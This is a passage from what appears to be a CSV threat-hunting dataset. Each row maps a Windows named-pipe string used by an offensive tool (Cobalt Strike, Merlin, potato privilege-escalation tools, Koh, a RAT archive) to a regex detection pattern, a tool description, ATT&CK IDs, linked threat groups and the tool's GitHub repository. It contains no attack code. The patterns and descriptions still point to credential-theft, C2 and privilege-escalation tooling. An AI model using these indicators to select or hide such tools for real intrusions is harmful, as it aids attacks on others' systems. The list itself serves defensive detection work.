T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","13583" "*\\.\pipe\bypassuac*",".{0,1000}\\\\\.\\pipe\\bypassuac.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13584" "*\\.\pipe\coerced\pipe\spoolss*",".{0,1000}\\\\\.\\pipe\\coerced\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","#namedpipe","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","13585" "*\\.\pipe\EasySystem*",".{0,1000}\\\\\.\\pipe\\EasySystem.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#namedpipe","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","13586" "*\\.\pipe\hashdump*",".{0,1000}\\\\\.\\pipe\\hashdump.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13587" "*\\.\pipe\imposecost*",".{0,1000}\\\\\.\\pipe\\imposecost.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#namedpipe","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","13588" 
"*\\.\pipe\keylogger*",".{0,1000}\\\\\.\\pipe\\keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13589" "*\\.\pipe\Merlin*",".{0,1000}\\\\\.\\pipe\\Merlin.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 
- TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#namedpipe","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","13590" "*\\.\pipe\merlin*",".{0,1000}\\\\\.\\pipe\\merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#namedpipe","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","13591" "*\\.\pipe\mimi*",".{0,1000}\\\\\.\\pipe\\mimi.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","#namedpipe","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","13592" "*\\.\pipe\mimikatz*",".{0,1000}\\\\\.\\pipe\\mimikatz.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - 
MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13593" "*\\.\pipe\netview*",".{0,1000}\\\\\.\\pipe\\netview.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13594" "*\\.\pipe\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*",".{0,1000}\\\\\.\\pipe\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum 
- REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13596" "*\\.\pipe\portscan*",".{0,1000}\\\\\.\\pipe\\portscan.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13597" "*\\.\pipe\PrivFu*",".{0,1000}\\\\\.\\pipe\\PrivFu.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#namedpipe","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13598" "*\\.\pipe\pwned/pipe/srvsvc*",".{0,1000}\\\\\.\\pipe\\pwned\/pipe\/srvsvc.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","#namedpipe","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","13599" "*\\.\pipe\RemoteMaint*",".{0,1000}\\\\\.\\pipe\\RemoteMaint.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#namedpipe","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","13600" "*\\.\pipe\screenshot*",".{0,1000}\\\\\.\\pipe\\screenshot.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13601" "*\\.\pipe\sshagent*",".{0,1000}\\\\\.\\pipe\\sshagent.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13602" "*\\.\pipe\test\pipe\spoolss *",".{0,1000}\\\\\.\\pipe\\test\\pipe\\spoolss\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#namedpipe","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","13605" "*\\.\pipe\WinPwnagePipe*",".{0,1000}\\\\\.\\pipe\\WinPwnagePipe.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#namedpipe","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","13606" 
"*\\.\pipe\win-sux-no-async-anon-pipe-*-*",".{0,1000}\\\\\.\\pipe\\win\-sux\-no\-async\-anon\-pipe\-.{0,1000}\-.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#namedpipe","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","13607" "*\\.\pipe\wzcsvc_wep_keys*",".{0,1000}\\\\\.\\pipe\\wzcsvc_wep_keys.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#namedpipe","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13608" "*\\.pipe\imposingcost*",".{0,1000}\\\\\.pipe\\imposingcost.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 
BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#namedpipe","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","13609" "*\\:C*",".{0,1000}\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed c:\\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13610" "*\\??\\Jormungandr*",".{0,1000}\\\\\?\?\\\\Jormungandr.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation 